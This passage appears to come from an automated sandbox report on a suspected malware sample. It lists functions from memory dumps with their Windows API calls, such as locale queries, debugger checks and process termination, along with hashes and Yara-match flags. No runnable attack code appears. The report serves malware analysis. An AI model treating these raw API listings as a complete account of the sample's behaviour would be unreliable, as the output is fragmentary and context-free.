                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                                                                                                                                        • String ID: 0B$DCA
                                                                                                                                                                                                                                                                                        • API String ID: 4212172061-1121888207
                                                                                                                                                                                                                                                                                        • Opcode ID: 46676c4ac3c69468ff1db77bf10ad3de6e3b023533a561db1a5166dfe2bba4dc
                                                                                                                                                                                                                                                                                        • Instruction ID: e41c47d1cae27ef38c8e1a894900132afe6bf825e943f98d621edfc326b9cdfb
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46676c4ac3c69468ff1db77bf10ad3de6e3b023533a561db1a5166dfe2bba4dc
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34610775700225AAD724AB65EC46BBB77E8EF04314F54006FF905DB283EB78ED418768
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,00000000,?,?,?,00420AE6,?,00000000), ref: 00420860
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,00000000,?,?,?,00420AE6,?,00000000), ref: 00420889
                                                                                                                                                                                                                                                                                        • GetACP.KERNEL32(?,?,00420AE6,?,00000000), ref: 0042089E
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                                                                                                                                        • String ID: ACP$OCP$B
                                                                                                                                                                                                                                                                                        • API String ID: 2299586839-1332025818
                                                                                                                                                                                                                                                                                        • Opcode ID: 06e0d05587b56d9904c443129aec0706fd7a1e514c1b8a60ecd4226da2314d5f
                                                                                                                                                                                                                                                                                        • Instruction ID: b7a8718eca8bd207e438c17e895b22dc0f84da9ff629001d2d850ed802a8b5f8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 06e0d05587b56d9904c443129aec0706fd7a1e514c1b8a60ecd4226da2314d5f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5321F422B00124AADB34AF14E900BA773E6EF90B10BD68476E809D7312E736DD41C3D9
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __floor_pentium4
                                                                                                                                                                                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,04220D4D,?,00000000), ref: 04220AC7
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,04220D4D,?,00000000), ref: 04220AF0
                                                                                                                                                                                                                                                                                        • GetACP.KERNEL32(?,?,04220D4D,?,00000000), ref: 04220B05
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: GetLastError.KERNEL32(?,?,0420E697,?,?,?,0420ED94,?), ref: 04216F84
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _free.LIBCMT ref: 04216FB7
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: SetLastError.KERNEL32(00000000), ref: 04216FF8
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _abort.LIBCMT ref: 04216FFE
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _free.LIBCMT ref: 04216FDF
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: SetLastError.KERNEL32(00000000), ref: 04216FEC
                                                                                                                                                                                                                                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 04220D0E
                                                                                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 04220D69
                                                                                                                                                                                                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 04220D78
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,042145A4,00000040,?,042146C4,00000055,00000000,?,?,00000055,00000000), ref: 04220DC0
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,04214624,00000040), ref: 04220DDF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 745075371-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: GetLastError.KERNEL32(?,?,0420E697,?,?,?,0420ED94,?), ref: 04216F84
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _free.LIBCMT ref: 04216FB7
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: SetLastError.KERNEL32(00000000), ref: 04216FF8
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _abort.LIBCMT ref: 04216FFE
                                                                                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,042145AB,?,?,?,?,04214002,?,00000004), ref: 042203AC
                                                                                                                                                                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 0422043C
                                                                                                                                                                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 0422044A
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,042145AB,00000000,042146CB), ref: 042204ED
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4212172061-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(0042044E,00000001,00000000,?,=CA,?,00420A7B,00000000,?,?,?), ref: 00420398
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                                                                        • String ID: =CA${B
                                                                                                                                                                                                                                                                                        • API String ID: 1084509184-2907596089
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004204A2
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004204F3
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004205B3
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2829624132-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00410833
                                                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041083D
                                                                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041084A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 04210A9A
                                                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 04210AA4
                                                                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 04210AB1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000003,?,04213C24,00000003,00439450,0000000C,04213D7B,00000003,00000002,00000000,?,04212DD2,00000003), ref: 04213C6F
                                                                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,04213C24,00000003,00439450,0000000C,04213D7B,00000003,00000002,00000000,?,04212DD2,00000003), ref: 04213C76
                                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 04213C88
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                                                        • API String ID: 0-2784972518
                                                                                                                                                                                                                                                                                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                                        • Instruction ID: 146e09ecf9d5328e4e0b558be605c6a6ff4e14acec4e23645b533189d3af5a7f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB316BB6A10609DFEB10CF99D880BADBBF5FF08724F14804AD541A7251D7B1FA45CBA4
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: .
                                                                                                                                                                                                                                                                                        • API String ID: 0-248832578
                                                                                                                                                                                                                                                                                        • Opcode ID: cb517d5a815ffc9819fbc41a8d1b52c99bc6f3e39d79201209cac43163c2d673
                                                                                                                                                                                                                                                                                        • Instruction ID: 5858c32c973f9b028c51109d6fdea45301b38e121b5e506b78abc6587599c678
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb517d5a815ffc9819fbc41a8d1b52c99bc6f3e39d79201209cac43163c2d673
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A43124B1D04208AFCB24CE79CC84EEB7BBDDF85354F0401AEF41997252E6389D858B54
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: .
                                                                                                                                                                                                                                                                                        • API String ID: 0-248832578
                                                                                                                                                                                                                                                                                        • Opcode ID: cb517d5a815ffc9819fbc41a8d1b52c99bc6f3e39d79201209cac43163c2d673
                                                                                                                                                                                                                                                                                        • Instruction ID: 6befaf63bffbf4c90ac72d88c8c27f85ccb355236c0090c9daba6852a1663104
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb517d5a815ffc9819fbc41a8d1b52c99bc6f3e39d79201209cac43163c2d673
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E131FB72A20249AFDB249E78CC84EFB7BFDDF85314F140598E518D7261D670B945CB50
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(0042069E,00000001,?,?,=CA,?,00420A3F,=CA,?,?,?,?,?,0041433D,?,?), ref: 0042040D
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                                                                        • String ID: =CA
                                                                                                                                                                                                                                                                                        • API String ID: 1084509184-159236625
                                                                                                                                                                                                                                                                                        • Opcode ID: a96536e0df95889afedebea6b283c6d928245b59909cdca84085bef51b7701ed
                                                                                                                                                                                                                                                                                        • Instruction ID: 2495996395a678c0b0b6d2c4eccef08732c43701ffe65dee0c881fbc629916fd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a96536e0df95889afedebea6b283c6d928245b59909cdca84085bef51b7701ed
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 85F0C8363003145FD7246F79AC9167A7BD5EF8035CB55842EFA458B641D6B59C428A04
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00413D9B,?,00000004), ref: 00417537
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                                                                                                                                        • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                                                                                        • API String ID: 2299586839-2904428671
                                                                                                                                                                                                                                                                                        • Opcode ID: a1e251d402f626eafc57a2dc60530b21e3b199b9edc33d4a7c03029131258f5a
                                                                                                                                                                                                                                                                                        • Instruction ID: 6b67f736e2e63cc60f408e8e0dfee7a9fd2cac623ca874a3f295f3da83e4a478
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a1e251d402f626eafc57a2dc60530b21e3b199b9edc33d4a7c03029131258f5a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88F0F631740218B7DB11AF61AC01FAE3B71DF48711F90005BFC0527292CE355E509A9D
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 7299cbe181a480e96aa1d0823b8b75374db67f9795f27445fcbabf9e3bc0ca98
                                                                                                                                                                                                                                                                                        • Instruction ID: 57b2c8c2af9200c539743d1e838558d093200d52225ae661a65c97ab255a42b1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7299cbe181a480e96aa1d0823b8b75374db67f9795f27445fcbabf9e3bc0ca98
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 49024C71E002199FDF14CFA9D9806EEB7F1FF88314F25826AD819E7380D774AA518B94
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 331f1b043438bf50c0d0bb34769695c962d67a9a75435153f21e753d807b965d
                                                                                                                                                                                                                                                                                        • Instruction ID: ecfd1169dd1db74fa8b1fbb545b0aaa264cace438e4dc3e6548e63d18cfefdb9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 331f1b043438bf50c0d0bb34769695c962d67a9a75435153f21e753d807b965d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8B024C71E1021ADFDF14CFA9D8806AEB7F1EF58314F2581AAE819F7254D730A941CB94
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0041B846,?,?,00000008,?,?,0042362F,00000000), ref: 0041BA78
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 0a74b9dc259a9f0ad9fa9a5fcf617859e4d67a11803a70fb154078e68e54c131
                                                                                                                                                                                                                                                                                        • Instruction ID: 0c2c29198f1904db5ab12468f0c2f7b68f4f63301914c53b8217cadea3e25972
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a74b9dc259a9f0ad9fa9a5fcf617859e4d67a11803a70fb154078e68e54c131
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6CB17E716206088FD715CF28C486BA57BE0FF45364F258659E9D9CF3A1C739E982CB84
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
